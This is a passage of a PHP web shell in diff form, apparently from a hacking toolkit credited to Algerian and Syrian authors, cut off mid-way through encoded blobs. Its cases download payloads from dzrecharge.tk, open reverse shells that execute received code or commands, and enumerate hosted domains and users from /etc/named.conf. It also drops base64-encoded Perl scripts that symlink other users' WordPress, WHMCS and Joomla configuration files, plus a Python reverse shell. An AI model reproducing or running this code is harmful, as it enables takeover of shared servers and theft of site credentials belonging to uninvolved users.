+VDAvbWRVaW9ibStPMlBHKzZDckoyNlZpeUJvRlM2dEFJZ2g1Sm1QM1BWYXdZSzVxUUc3VUJ5b2NX
+OHBOMTEvaW91blpjZWp0VkFHaEduUE51QVdLOWM1SmRIbmRtZ01CUjhpbjNUR2JxeTN6L1lrMFNs
+Zy9Jc2hHc0lsYjFNaVB1UmJCVWdRZnkrY3dyQ09HcUU0dHdKMkxXbTQ3cFJDTnljckl3Y0thczdC
+Q3Q3K2diRFozcXYvNDdNQTVyTmpKbExDRDJ6SzhCTUhObURROTRDMldpZ1hna0VTZnIzOWNnVyty
+Wlh5SmtweElKaU5NNTNGdTlBNG5vUWpUS0tUK1hHcUtaYXIyS0l2WVNOdkdZcjZYVVdvL3R4NFlS
+UWFKQ0RQNThKRHFkN1RCUFlwME9OZll4YnQ5Tit1ZGhyT2pIRk1BUXB4eFg3NWEvWVE0OG0waXZz
+dVk0UlhJVm9xcnZ0QW45UGVuRWZlcVAzMU0xTlhzV2hkZ3dwRWtDd21QYW0vbDFyZ3BNc2ZEZDJr
+a2dJU3pLTGQvNlFnak1yb2dEVjlhYkZ1TUhsU0wzOFdNTkFTeWlWREE3TzZOWnVLUXVQYzh5K0cx
+OU8rSFdJKytCOUlvZTVHcUdyYmoyTFdHdkNZNG56ZUlKWVdjZUpVTkQ5WXQvL0VhcmZxckloOVg1
+VC80RnZYOUt5RHNjanFhbXNOYWM4cWlvZzViaHdWMG5NaktIRzZqaUNvN21zSTlXNG1rVTUwaS9Y
+VE5NMGEwVENjWjl4TTl2aWJ5bWFyMzdkSGRUMHZaOHJWR0lYU1Z0dkZLbytTZDNKTEhLYjQ1emd5
+TUw4N0xHbm5IUDBjaXVmT2JQWElOeGliVnFvcEtZN2R2VVRCb3d2dGFWTnJUb2w3ZnBYTTA1a0Vn
+MVRPZW1oTXN1TTNBUHJvSnAyNTBmYTJhbk5ua0Z4dG9kYUlRU3ptYVJZeGZXanptT01nVEovNWFl
+VVVhczZLa2VZK1A0ckRCbVZUalhPcS9mMVpqcExGcFp6bTR5MUc3MHk0a0tXWG4wZU9DM3VWZVVn
+OGY0YktRQUM1Z21pRnBHSVpaOE05ZmYvNzgrZnZYLy83N0x3PT0nKSkpOwoKPz4=';
+
+$file = fopen("perlbypass.php" ,"w+");
+$write = fwrite ($file ,base64_decode($perltoolss));
+fclose($file);
+� �echo "<iframe src=perltools/perlbypass.php width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_10":
+
+� � mkdir('autoroot', 0755);
+� � chdir('autoroot');
+$file = fopen("autoroot.txt" ,"w+");
+
+$sa=file_get_contents('http://dzrecharge.tk/pv8L/1.txt');
+
+$write = fwrite ($file ,$sa);
+
+fclose($file);
+
+if ($write) {
+
+echo "The File Was Created Successfuly.</br>";
+
+}
+else {echo'"error"';}
+
+$chm = chmod("autoroot.txt" , 0755);
+
+if ($chm == true){
+� � echo "chmoded the file to 755";
+}else{
+� � echo "sorry file didn't chmoded";
+}
+break;
+case "PHP_11":
+
+� � mkdir('cgi', 0755);
+� � chdir('cgi');
+� � $file = fopen("jeentel" ,"w+");
+� � $sa=file_get_contents('http://dzrecharge.tk/pv8L/jeentel');
+� � $write = fwrite ($file ,$sa);
+� � chmod("jeentel",0777);
+� � $file = fopen("cgiPerl.dz" ,"w+");
+� � $sa=file_get_contents('http://dzrecharge.tk/pv8L/dz.txt');
+� � $write = fwrite ($file ,$sa);
+� � chmod("cgiPerl.dz",0755);
+� � � � $kokdosya = ".htaccess";
+� � � � $dosya_adi = "$kokdosya";
+� � � � $dosya = fopen ($dosya_adi , 'w') or die ("Dosya
+a&#231;&#305;lamad&#305;!");
+� � � � $metin = "AddType application/x-httpd-cgi .dz
+AddHandler cgi-script .dz";
+� � � � fwrite ( $dosya , $metin ) ;
+� � � � fclose ($dosya);
+� �echo "<iframe src=cgi/cgiPerl.dz width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_12":
+
+{
+� � $ipz =$_SERVER["REMOTE_ADDR"];
+� � $portz ="22";
+� � if ($ipz == "" && $portz == ""){echo "Please fill IP Adress & The
+listen Port";}
+� � else
+� � {
+� � � � $ipaddr = $ipz;
+� � � � $port = $portz;
+� � � � if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}
+� � � � if (is_callable('stream_socket_client'))
+� � � � {
+� � � � � � $msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");
+� � � � � � if (!$msgsock){die();}
+� � � � � � $msgsock_type = 'stream';
+� � � � }
+� � � � elseif (is_callable('fsockopen'))
+� � � � {
+� � � � � � $msgsock = fsockopen($ipaddr,$port);
+� � � � � � if (!$msgsock) {die(); }
+� � � � � � $msgsock_type = 'stream';
+� � � � }
+� � � � elseif (is_callable('socket_create'))
+� � � � {
+� � � � � � $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+� � � � � � $res = socket_connect($msgsock, $ipaddr, $port);
+� � � � � � if (!$res) {die(); }
+� � � � � � $msgsock_type = 'socket';
+� � � � }
+� � � � else {die();}
+� � � � switch ($msgsock_type)
+� � � � {
+� � � � � � case 'stream': $len = fread($msgsock, 4); break;
+� � � � � � case 'socket': $len = socket_read($msgsock, 4); break;
+� � � � }
+� � � � if (!$len) {die();}
+� � � � $a = unpack("Nlen", $len);
+� � � � $len = $a['len'];
+� � � � $buffer = '';
+� � � � while (strlen($buffer) < $len)
+� � � � {
+� � � � � � switch ($msgsock_type)
+� � � � � � {
+� � � � � � � � case 'stream': $buffer .= fread($msgsock,
+$len-strlen($buffer));
+� � � � � � � � break;
+� � � � � � � � case 'socket': $buffer .= socket_read($msgsock,
+$len-strlen($buffer));
+� � � � � � � � break;
+� � � � � � }
+� � � � }
+� � � � eval($buffer);
+� � � � echo "[*] Connection Terminated";
+� � � � die();
+� � }
+}
+break;
+case "PHP_13":
+
+{
+� � � � $env = array('PATH' =>
+'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
+� � � � $descriptorspec = array(
+� � � � 0 => array("pipe","r"),
+� � � � 1 => array("pipe","w"),
+� � � � 2 => array("file","/tmp/log.txt","a"));
+� � � � $ipx =$_SERVER["REMOTE_ADDR"];
+� � � � $portx ="22";
+� � � � $proto=getprotobyname("tcp");
+� � � � if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0)
+� � � � { die("[-] Socket Create Faile");}
+� � � � if(($ret=socket_connect($sock,$ipx,$portx))<0)
+� � � � { die("[-] Connect Faile");}
+� � � � else{
+� � � � $message="----------------------PHP Connect-Back--------------------\n";
+� � � � $message.="----------------------- SyRiAn Sh3ll --------------------\n";
+� � � � socket_write($sock,$message,strlen($message));
+� � � � $cwd=str_replace('\\','/',dirname(__FILE__));
+� � � � while($cmd=socket_read($sock,65535,$proto))
+� � � � � �{
+� � � � � �if(trim(strtolower($cmd))=="exit"){socket_write($sock,"Bye
+Bye\n");exit;}
+� � � � � �else{
+� � � � � � $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
+� � � � � � if (is_resource($process)) {
+� � � � � � fwrite($pipes[0], $cmd);
+� � � � � � fclose($pipes[0]);
+� � � � � � $msg=stream_get_contents($pipes[1]);
+� � � � � � socket_write($sock,$msg,strlen($msg));
+� � � � � � fclose($pipes[1]);
+� � � � � � $return_value = proc_close($process);}
+� � � � � �}
+� � � � � � }
+� � � � }
+� � }
+break;
+case "PHP_14":
+
+echo "<title># Domains & Users</title>
+<style>
+body,table{background: black; font-family:Verdana,tahoma; color:
+white; font-size:10px; }
+A:link {text-decoration: none;color: red;}
+A:active {text-decoration: none;color: red;}
+A:visited {text-decoration: none;color: red;}
+A:hover {text-decoration: underline; color: red;}
+#new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
+tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
+</style>
+<p align=center># Domains & Users</p>
+<p align=center>Karar alShaMi t00l with PHP .. Maked By Lagripe-Dz
+..?!</p><center>";
+
+$d0mains = @file("/etc/named.conf");
+
+if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }
+
+echo "<table align=center border=1>
+<tr bgcolor=green><td>d0mains</td><td>users</td></tr>";
+
+foreach($d0mains as $d0main){
+
+if(eregi("zone",$d0main)){
+
+preg_match_all('#zone "(.*)"#', $d0main, $domains);
+flush();
+
+if(strlen(trim($domains[1][0])) > 2){
+
+$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
+
+echo "<tr><td><a
+href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";
+flush();
+
+}}}
+
+echo "</table>
+<p align='center'>
+MaDe in AlGeriA 2o11 (r)
+</p>
+";
+break;
+case "PHP_15":
+� � mkdir('ShowsourceRead', 0755);
+� � � � chdir('ShowsourceRead');
+
+$filexc = 'ZWNobyAiPGh0bWw+CjwvdGQ+PC90cj48L3RhYmxlPjxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlw
+ZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YScgPgo8L3RkPjwvdHI+PC90YWJsZT48Zm9ybSBtZXRob2Q9
+J1BPU1QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnID4KPGJyPgo8Yj5zaG93X3NvdXJj
+ZSAgOiA8L2I+PGlucHV0IHR5cGU9J3RleHQnIG5hbWU9J3Nob3cnIHZhbHVlPScnIHNpemU9JzU5
+JyBzdHlsZT0nY29sb3I6ICNmZmZmZmY7IGJvcmRlcjogMXB4IGRvdHRlZCByZWQ7IGJhY2tncm91
+bmQtY29sb3I6ICMwMDAwMDAnPjwvcD4KPGI+aGlnaGxpZ2h0X2ZpbGUgOiA8L2I+PGlucHV0IHR5
+cGU9J3RleHQnIG5hbWU9J2hpZ2gnIHZhbHVlPScnIHNpemU9JzU5JyBzdHlsZT0nY29sb3I6ICNm
+ZmZmZmY7IGJvcmRlcjogMXB4IGRvdHRlZCAjZmZmZmZmOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAw
+MDAwJz48L3A+CjxpbnB1dCB0eXBlPSdzdWJtaXQnJyAgdmFsdWU9J1JlYWQnICBzdHlsZT0nY29s
+b3I6IHJlZDsgYm9yZGVyOiAxcHggZG90dGVkIG9yYW5nZTsgYmFja2dyb3VuZC1jb2xvcjogZ3Jl
+ZW4nPjwvZm9ybTwvcD4KPC9mb3JtPC9wPiI7Cjw/cGhwCmlmKGVtcHR5KCRfUE9TVFsnc2hvdydd
+KSkKewp9CmVsc2UKewokcyA9ICRfUE9TVFsnc2hvdyddOwplY2hvICI8Yj48aDE+PGZvbnQgc2l6
+ZT0nNCcgY29sb3I9J3JlZCc+c2hvd19zb3VyY2U8L2ZvbnQ+PC9oMT4iOwokc2hvdyA9IHNob3df
+c291cmNlKCRzKTsKfQppZihlbXB0eSgkX1BPU1RbJ2hpZ2gnXSkpCnsKfQplbHNlCnsKJGggPSAk
+X1BPU1RbJ2hpZ2gnXTsKZWNobyAiPGI+PGgxPjxmb250IHNpemU9JzQnIGNvbG9yPSdncmVlbic+
+aGlnaGxpZ2h0X2ZpbGU8L2ZvbnQ+PC9oMT4iOwplY2hvICI8YnI+IjsKJGhpZ2ggPSBoaWdobGln
+aHRfZmlsZSgkaCk7Cn0KPz4=';
+
+$file = fopen("read.php" ,"w+");
+$write = fwrite ($file ,base64_decode($filexc));
+fclose($file);
+� �echo "<iframe src=ShowsourceRead/read.php width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_16":
+� � mkdir('configler', 0755);
+� � chdir('configler');
+� � � � $kokdosya = ".htaccess";
+� � � � $dosya_adi = "$kokdosya";
+� � � � $dosya = fopen ($dosya_adi , 'w') or die ("Dosya
+a&#231;&#305;lamad&#305;!");
+� � � � $metin = "AddHandler cgi-script .izo";
+� � � � fwrite ( $dosya , $metin ) ;
+� � � � fclose ($dosya);
+$configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBl
+OiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9E
+VEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRt
+bDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3
+LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1M
+YW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5
+cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT5bfl0gQ3li
+M3ItRFogQ29uZmlnIC0gW35dIDwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5l
+d1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQog
+Zm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRl
+cjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87
+DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7
+IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3Vy
+ZS5waHAnLCRrb2xhLictc2hvcC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJs
+aWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywka29sYS4nLWFtZW1iZXIudHh0Jyk7DQpz
+eW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRrb2xh
+LictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
+bWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGlu
+aygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLicyLnR4dCcp
+Ow0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2Nv
+bmZpZy5waHAnLCRrb2xhLictZm9ydW0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
+cHVibGljX2h0bWwvYWRtaW4vY29uZi5waHAnLCRrb2xhLic1LnR4dCcpOw0Kc3ltbGluaygnL2hv
+bWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLic0LnR4dCcp
+Ow0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRr
+b2xhLictd3AxMy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9i
+bG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy9ob21l
+LycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRrb2xhLic2LnR4dCcpOw0K
+c3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvZGIucGhwJywka29s
+YS4nNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0
+LnBocCcsJGtvbGEuJzgudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0
+bWwvbWtfY29uZi5waHAnLCRrb2xhLic5LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4n
+L3B1YmxpY19odG1sL2luY2x1ZGUvY29uZmlnLnBocCcsJGtvbGEuJzEyLnR4dCcpOw0Kc3ltbGlu
+aygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcs
+JGtvbGEuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0
+bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy12Yi50eHQnKTsNCnN5bWxpbmsoJy9o
+b21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWlu
+Y2x1ZGVzLXZiLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3do
+bS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0xNS50eHQnKTsNCnN5bWxpbmsoJy9ob21l
+LycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdo
+bWMxNi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9j
+b25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycu
+JHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1
+cHBvcnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmln
+dXJhdGlvbi5waHAnLCRrb2xhLicxd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2Vy
+LicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJy13aG1jczIudHh0Jyk7DQpz
+eW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9u
+LnBocCcsJGtvbGEuJy1jbGllbnRzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1
+YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0Jyk7
+DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZXMvY29uZmlndXJh
+dGlvbi5waHAnLCRrb2xhLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIu
+Jy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmcu
+dHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZS9jb25m
+aWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycu
+JHVzZXIuJy9wdWJsaWNfaHRtbC9teS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5n
+LnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teXNob3AvY29u
+ZmlndXJhdGlvbi5waHAnLCRrb2xhLictYmlsbGluZy50eHQnKTsgDQp9DQppZiAoJEVOVnsnUkVR
+VUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsn
+Q09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RS
+SU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAo
+QHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFt
+ZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFj
+aygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMv
+JShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JN
+eyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8
+Ym9keSBjbGFzcz0ibmV3U3R5bGUxIiBiZ2NvbG9yPSIjMDAwMDAwIj4NCjxwPkN5YjNyLWR6IENv
+bmZpZyBGdWNrIFNjcmlwdDwvcD4NCjxwPjxmb250IGNvbG9yPSIjQzBDMEMwIj5bPC9mb250PiBD
+b2RlZCBCeSBDeWIzci1EWiA8Zm9udCBjb2xvcj0iI0MwQzBDMCI+fDwvZm9udD4gDQreYSBATy4g
+ZskcZS8g3mE8c3BhbiBpZD0icmVzdWx0X2JveCIgY2xhc3M9InNob3J0X3RleHQiIGxhbmc9ImVu
+Ij48c3BhbiBzdHlsZSB0aXRsZT4NCjxmb250IGNvbG9yPSIjQzBDMEMwIj58PC9mb250Pjwvc3Bh
+bj48L3NwYW4+IDxhIGhyZWY9Imh0dHA6Ly93d3cud3d3LnNlYzRldmVyLmNvbSI+DQo8c3BhbiBz
+dHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+d3d3LnNl
+YzRldmVyLmNvbTwvZm9udD48L3NwYW4+PC9hPiANCjxmb250IGNvbG9yPSIjQzBDMEMwIj5dPC9m
+b250PjwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5
+bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMEZGRkY7IHdpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MjBw
+eDsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDOyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6
+ZTo4cHQ7IGNvbG9yOiMwMEZGRkYiICA+PC90ZXh0YXJlYT48YnIgLz4NCiZuYnNwOzxwPg0KPGlu
+cHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMEZG
+RkY7IHdpZHRoOiAyMTJweDsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDOyBmb250LWZhbWlseTpU
+YWhvbWE7IGZvbnQtc2l6ZTo4cHQ7IGNvbG9yOiMwMEZGRkY7ICIgIC8+PGJyIC8+DQombmJzcDs8
+L3A+DQo8cD4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJHZXQg
+Q29uZmlnIiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwRkZGRjsgd2lkdGg6IDk5OyBmb250
+LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjojMDBGRkZGOyB0ZXh0LXRyYW5z
+Zm9ybTp1cHBlcmNhc2U7IGhlaWdodDoyMzsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDIiAvPjwv
+cD4NCjwvZm9ybT4nOw0KfWVsc2V7DQpAbGluZXMgPTwkRk9STXtwYXNzfT47DQokeSA9IEBsaW5l
+czsNCm9wZW4gKE1ZRklMRSwgIj50YXIudG1wIik7DQpwcmludCBNWUZJTEUgInRhciAtY3pmICIu
+JEZPUk17dGFyfS4iLnRhciAiOw0KZm9yICgka2E9MDska2E8JHk7JGthKyspew0Kd2hpbGUoQGxp
+bmVzWyRrYV0gID1+IG0vKC4qPyk6eDovZyl7DQombGlsKCQxKTsNCnByaW50IE1ZRklMRSAkMS4i
+LnR4dCAiOw0KZm9yKCRrZD0xOyRrZDwxODska2QrKyl7DQpwcmludCBNWUZJTEUgJDEuJGtkLiIu
+dHh0ICI7DQp9DQp9DQogfQ0KcHJpbnQnPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0i
+IzAwMDAwMCI+DQo8cD5Eb25lICEhPC9wPg0KPHA+Jm5ic3A7PC9wPic7DQppZigkRk9STXt0YXJ9
+IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3Nl
+KElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0u
+Jy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRp
+b246IG5vbmUiPkNsaWNrIEhlcmUgVG8gRG93bmxvYWQgVGFyIEZpbGU8L3NwYW4+PC9mb250Pjwv
+YT48L3A+JzsNCn0NCn0NCiBwcmludCINCjwvYm9keT4NCjwvaHRtbD4iOw==';
+
+$file = fopen("config.izo" ,"w+");
+$write = fwrite ($file ,base64_decode($configshell));
+fclose($file);
+� � chmod("config.izo",0755);
+� �echo "<iframe src=configler/config.izo width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_17":
+
+$bizci = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCgojICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMg
+IyAjICMgIyAjICMgIyAjICMgIyAjICMKIyAgIGQwMHIucHkgMC4zYSAocmV2ZXJzZXxiaW5kKS1z
+aGVsbCBpbiBweXRob24gYnkgZlEJIwojCQkJCQkJCSMKIwlhbHBoYQkJCQkJCSMKIwkJCQkJCQkj
+CiMJCQkJCQkJIwojIHVzYWdlOiAJCQkJCQkjCiMgCSUgLi9kMDByIC1iIHBhc3N3b3JkIHBvcnQJ
+CQkjCiMJJSAuL2QwMHIgLXIgcGFzc3dvcmQgcG9ydCBob3N0CQkJIwojCSUgbmMgaG9zdCBwb3J0
+CQkJCQkjCiMJJSBuYyAtbCAtcCBwb3J0IChwbGVhc2UgdXNlIG5ldGNhdCkJCSMKIyAjICMgIyAj
+ICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIwkjCgoKaW1wb3J0
+IG9zLCBzeXMsIHNvY2tldCwgdGltZQoKCiMgPT09PT09PT09PT09PT09PT09PSB2YXIgPT09PT09
+PQpNQVhfTEVOPTEwMjQKU0hFTEw9Ii9iaW4venNoIC1jIgpUSU1FX09VVD0zMDAgI3MKUFc9IiIK
+UE9SVD0iIgpIT1NUPSIiCgoKIyA9PT09PT09PT09PT09PT09PT09IGZ1bmN0ID09PT09CiMgc2hl
+bGwgLSBleGVjIGNvbW1hbmQsIHJldHVybiBzdGRvdXQsIHN0ZGVycjsgaW1wcm92YWJsZQpkZWYg
+c2hlbGwoY21kKToKCXNoX291dD1vcy5wb3BlbihTSEVMTCsiICIrY21kKS5yZWFkbGluZXMoKQoJ
+bnNoX291dD0iIgoJZm9yIGkgaW4gcmFuZ2UobGVuKHNoX291dCkpOgkKCQluc2hfb3V0Kz1zaF9v
+dXRbaV0KCXJldHVybiBuc2hfb3V0CQoKIyBhY3Rpb24/CmRlZiBhY3Rpb24oY29ubik6Cgljb25u
+LnNlbmQoIlxuUGFzcz9cbiIpCgl0cnk6IHB3X2luPWNvbm4ucmVjdihsZW4oUFcpKQoJZXhjZXB0
+OiBwcmludCAidGltZW91dCIKCWVsc2U6CQoJCWlmIHB3X2luID09IFBXOgkKCQkJY29ubi5zZW5k
+KCJqMDAgYXJlIG9uIGFpciFcbiIpCQkJCQkJCgkJCXdoaWxlIFRydWU6ICAgICAgICAgICAgICAg
+CQkKCQkJCWNvbm4uc2VuZCgiPj4+ICIpCgkJCQl0cnk6CgkJCQkJcGNtZD1jb25uLnJlY3YoTUFY
+X0xFTikKCQkJCWV4Y2VwdDoKCQkJCQlwcmludCAidGltZW91dCIKCQkJCQlyZXR1cm4gVHJ1ZQkJ
+CQkJCgkJCQllbHNlOgoJCQkJCSNwcmludCAicGNtZDoiLHBjbWQKCQkJCQljbWQ9IiIjcGNtZAoJ
+CQkJCWZvciBpIGluIHJhbmdlKGxlbihwY21kKS0xKToKCQkJCQkJY21kKz1wY21kW2ldCgkJCSAg
+ICAgICAgICAgICAgICBpZiBjbWQ9PSI6ZGMiOgoJCQkJCQlyZXR1cm4gVHJ1ZQoJCQkJCWVsaWYg
+Y21kPT0iOnNkIjoKCQkJCQkJcmV0dXJuIEZhbHNlCgkJCQkJZWxzZToKCQkJCQkJaWYgbGVuKGNt
+ZCk+MDoKCQkJCQkJCW91dD1zaGVsbChjbWQpCgkJCQkJCQljb25uLnNlbmQob3V0KQoKCiMgPT09
+PT09PT09PT09PT09PT09PSBtYWluID09PT09PQphcmd2PXN5cy5hcmd2CgppZiBsZW4oYXJndik8
